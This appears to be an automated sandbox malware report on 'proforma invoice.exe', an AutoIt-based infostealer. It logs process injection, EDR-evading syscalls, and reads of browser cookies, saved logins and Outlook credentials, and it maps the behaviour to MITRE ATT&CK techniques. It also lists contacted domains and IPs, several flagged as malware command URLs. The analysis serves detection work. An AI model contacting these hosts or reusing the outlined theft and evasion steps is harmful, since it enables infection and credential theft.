            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtClose: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\proforma invoice.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe Thread register set: target process: 8032
            Source: C:\Windows\SysWOW64\clip.exe Thread APC queued: target process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
            Source: C:\Users\user\Desktop\proforma invoice.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 268E008
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00B01201
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00AE2BA5
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B0B226 SendInput,keybd_event, 0_2_00B0B226
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00B222DA
            Source: C:\Users\user\Desktop\proforma invoice.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\proforma invoice.exe"
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00B00B62
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00B01663
            Source: proforma invoice.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: proforma invoice.exe, NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: NpiZrjTdIDFUidJcY.exe, 00000002.00000000.1775638132.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103793814.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920393298.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AC0698 cpuid 0_2_00AC0698
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00B18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00B18195
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AFD27A GetUserNameW, 0_2_00AFD27A
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00ADBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00ADBB6F
            Source: C:\Users\user\Desktop\proforma invoice.exe Code function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00AA42DE

            Stealing of Sensitive Information

            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: proforma invoice.exeBinary or memory string: WIN_81
            Source: proforma invoice.exeBinary or memory string: WIN_XP
            Source: proforma invoice.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: proforma invoice.exeBinary or memory string: WIN_XPe
            Source: proforma invoice.exeBinary or memory string: WIN_VISTA
            Source: proforma invoice.exeBinary or memory string: WIN_7
            Source: proforma invoice.exeBinary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B21204 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\proforma invoice.exe | Code function: 0_2_00B21806 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK Matrix

Techniques are listed per tactic column of the original matrix. A number in parentheses is the count badge shown on a matched technique in the original, reproduced as extracted; techniques without a number had no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (241); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1497807
Sample: proforma invoice.exe
Startdate: 23/08/2024
Architecture: WINDOWS
Score: 100

Top-level DNS/IP info: www.xn--matfrmn-jxa4m.se; www.xn--fhq1c541j0zr.com; 13 other IPs or domains
Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree (indentation shows parent to child; "started" and "injected" are the edge labels from the graph; a number in parentheses after a process name is the count badge shown on that node):

proforma invoice.exe (4), started
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  svchost.exe, started
    Signatures: Maps a DLL or memory area into another process
    NpiZrjTdIDFUidJcY.exe, injected
      Signatures: Found direct / indirect Syscall (likely to bypass EDR)
      clip.exe (13), started
        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        NpiZrjTdIDFUidJcY.exe, injected
          DNS/IP info: www.anuts.top 23.251.54.212, ports 49754, 49755, 49756, VPSQUANUS United States; parkingpage.namecheap.com 91.195.240.19, ports 49766, 49767, 49768, SEDO-ASDE Germany; 8 other IPs or domains
          Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        firefox.exe, started

Source | Detection | Scanner | Label
proforma invoice.exe | 29% | ReversingLabs |
proforma invoice.exe | 29% | Virustotal |
proforma invoice.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
www.sandranoll.com | 11% | Virustotal |
www.dmtxwuatbz.cc | 2% | Virustotal |
www.xn--matfrmn-jxa4m.se | 0% | Virustotal |
www.catherineviskadi.com | 1% | Virustotal |
www.anuts.top | 7% | Virustotal |
www.telwisey.info | 2% | Virustotal |
www.bfiworkerscomp.com | 0% | Virustotal |
www.hatercoin.online | 2% | Virustotal |
www.gipsytroya.com | 8% | Virustotal |
www.xn--fhq1c541j0zr.com | 0% | Virustotal |
parkingpage.namecheap.com | 0% | Virustotal |
www.helpers-lion.online | 0% | Virustotal |
www.hprlz.cz | 1% | Virustotal |
Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/pics/29590/bg1.png) | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://dts.gnpge.com | 0% | Avira URL Cloud | safe
https://cdn.consentmanager.net | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/pics/29590/bg1.png) | 0% | Virustotal |
http://www.xn--fhq1c541j0zr.com/rm91/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css | 0% | Virustotal |
https://dts.gnpge.com | 0% | Virustotal |
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | 0% | Virustotal |
http://www.bfiworkerscomp.com/xzzi/ | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | 0% | Virustotal |
https://static.loopia.se/responsive/images/iOS-72.png | 0% | Avira URL Cloud | safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
http://www.xn--fhq1c541j0zr.com/rm91/ | 0% | Virustotal |
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png | 0% | Avira URL Cloud | safe
https://cdn.consentmanager.net | 0% | Virustotal |
http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/images/iOS-72.png | 0% | Virustotal |
https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | 0% | Virustotal |
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | 0% | Virustotal |
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 1% | Virustotal |
http://www.bfiworkerscomp.com/xzzi/ | 0% | Virustotal |
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png | 0% | Virustotal |
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | 0% | Virustotal |
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 1% | Virustotal |
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | 0% | Avira URL Cloud | safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Virustotal |
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 0% | Avira URL Cloud | safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | 0% | Virustotal |
https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | 0% | Avira URL Cloud | safe
http://www.dmtxwuatbz.cc/lfkn/ | 0% | Avira URL Cloud | safe
https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg | 0% | Avira URL Cloud | safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 1% | Virustotal |
http://i1.cdn-image.com/__media__/pics/28903/search.png) | 0% | Avira URL Cloud | safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Virustotal |
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png | 0% | Virustotal |
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | 0% | Virustotal |
https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg | 0% | Virustotal |
http://i1.cdn-image.com/__media__/pics/28905/arrrow.png) | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | 0% | Virustotal |
http://www.sandranoll.com/aroo/ | 100% | Avira URL Cloud | malware
http://i1.cdn-image.com/__media__/pics/28903/search.png) | 0% | Virustotal |
http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com | 0% | Avira URL Cloud | safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Avira URL Cloud | safe
https://delivery.consentmanager.net | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/pics/28905/arrrow.png) | 0% | Virustotal |
https://static.loopia.se/shared/style/2022-extra-pages.css | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | 0% | Virustotal |
http://www.gipsytroya.com/tf44/ | 100% | Avira URL Cloud | malware
http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com | 0% | Virustotal |
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Virustotal |
http://www.xn--matfrmn-jxa4m.se/4hda/ | 100% | Avira URL Cloud | malware
https://delivery.consentmanager.net | 0% | Virustotal |
http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/images/iOS-114.png | 0% | Avira URL Cloud | safe
https://static.loopia.se/shared/style/2022-extra-pages.css | 0% | Virustotal |
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://www.xn--matfrmn-jxa4m.se/4hda/ | 0% | Virustotal |
http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | 0% | Virustotal |
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | 0% | Avira URL Cloud | safe
http://www.gipsytroya.com/tf44/ | 7% | Virustotal |
http://www.telwisey.info/ei85/ | 0% | Avira URL Cloud | safe
http://www.bfiworkerscomp.com/Financial_Services.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2 | 0% | Avira URL Cloud | safe
